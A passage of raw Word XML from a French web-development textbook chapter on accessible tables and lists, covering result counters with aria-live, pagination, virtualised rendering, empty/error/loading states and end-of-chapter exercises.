                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Message et action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Réinitialisation</w:t>
            </w:r>
          </w:p>
        </w:tc>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Sortie du filtre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Bouton visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux éléments d'interface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 Annonce discrète du nombre de résultats --&gt;</w:t>
        <w:br/>
        <w:t>&lt;p id="compteur" role="status" aria-live="polite"&gt;24 résultats&lt;/p&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- État vide utile --&gt;</w:t>
        <w:br/>
        <w:t>&lt;div id="vide" hidden&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;Aucune commande ne correspond à « &lt;span id="terme"&gt;&lt;/span&gt; ».&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="button" id="reinitialiser"&gt;Effacer le filtre&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</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`ARIA-LIVE` TROP BAVARD FATIGUE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Annoncer chaque frappe sature le lecteur d'écran. Annoncez uniquement le nombre final après le délai, et jamais les deux à la fois.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>45.4 Grands volumes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Afficher dix mille lignes dans le DOM ralentit le navigateur. Deux approches existent : la pagination, plus simple, et la virtualisation, plus fluide mais plus complexe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2667000"/>
            <wp:docPr id="55" name="Picture 55"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f53.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.53 — Deux approches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une pagination lisible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 Pagination accessible --&gt;</w:t>
        <w:br/>
        <w:t>&lt;nav aria-label="Pagination des commandes"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="button" disabled aria-label="Page précédente"&gt;‹&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;span&gt;Page 2 sur 12&lt;/span&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="button" aria-label="Page suivante"&gt;›&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/nav&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une fenêtre de rendu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Rendu virtualisé simple : ne conserver que la fenêtre visible</w:t>
        <w:br/>
        <w:t>const HAUTEUR = 44;</w:t>
        <w:br/>
        <w:br/>
        <w:t>function rendreFenetre(conteneur, donnees, defilement) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const debut = Math.max(0, Math.floor(defilement / HAUTEUR) - 5);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const fin = Math.min(donnees.length, debut + 30);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  conteneur.style.height = `${donnees.length * HAUTEUR}px`;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  conteneur.replaceChildren(</w:t>
        <w:br/>
        <w:t>...donnees.slice(debut, fin).map((d, i) =&gt; creerLigne(d, (debut + i) *</w:t>
        <w:br/>
        <w:t xml:space="preserve">      HAUTEUR))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  );</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.156 — Quatre volumes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9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Volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Approche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="317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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2793"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt; 200 lignes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3047"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rendu complet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3174"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Simple et rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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200 à 2 000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Pagination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="317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Lisibilité et repères</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2793"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt; 2 000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3047"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Virtualisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3174"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DOM constant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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Défilement infini</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Chargement progressif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="317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Usage mobile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LE DÉFILEMENT INFINI COMPLIQUE LA REPRISE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un utilisateur qui revient en arrière perd sa position et son contexte. La pagination reste plus prévisible, sauf pour un fil d'actualité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>45.5 États et robustesse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une liste doit gérer quatre états, souvent oubliés : chargement, vide, erreur et résultat partiel. Les afficher explicitement évite les confusions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.157 — Quatre états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31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État</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Affichage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Erreur évitée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chargement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Squelette ou indicateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Page blanche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Vide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Message et action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Impression de panne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Message et réessai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Silence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Partiel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Bandeau d'avertissement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Données incomplètes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un chargement annoncé · html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 Squelette pendant le chargement, remplacé ensuite --&gt;</w:t>
        <w:br/>
        <w:t>&lt;div id="liste" aria-busy="true" aria-live="polite"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="squelette" aria-hidden="true"&gt;&lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="squelette" aria-hidden="true"&gt;&lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Après chargement --&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  liste.setAttribute("aria-busy", "false");</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;</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AFFICHER DES DONNÉES TABULAIRES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Choisir tableau ou liste selon la comparaison à faire.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Déclarer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>caption</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>scope</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et l'alignement des nombres.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Trier sur la valeur brute et annoncer avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>aria-sort</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Filtrer avec un délai et afficher le nombre de résultats.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Prévoir chargement, vide, erreur et résultat partiel.</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tableau compare, une liste parcourt.</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caption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendent un tableau compréhensible.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tableau de mise en page est une erreur d'accessibilité.</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aria-sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annonce la colonne et le sens du tri.</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tri doit porter sur la valeur brute.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filtre se temporise et affiche son nombre de résultats.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Au-delà de deux mille lignes, la virtualisation devient nécessaire.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Quatre états doivent être prévus : chargement, vide, erreur, partiel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vous savez présenter des données. Le volume se referme sur ses annexes.</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45.1 — Rendre un tableau accessible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 tableau de factures n'a ni titre ni en-têtes déclarés.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Ajoutez une légende.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Déclarez les en-têtes.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Alignez les montants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 45.2 — Trier sans casser l'accessibilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ACCESSIBILITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le tri par montant classe mal les nombres.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Stockez la valeur brute.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Triez numériquement.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 xml:space="preserve">Mettez à jour </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 45.3 — Choisir une stratégie d'affichage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une page affiche 8 000 commandes.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Évaluez les volumes.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Comparez les approches.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Justifiez.</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45.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&lt;table&gt;</w:t>
        <w:br/>
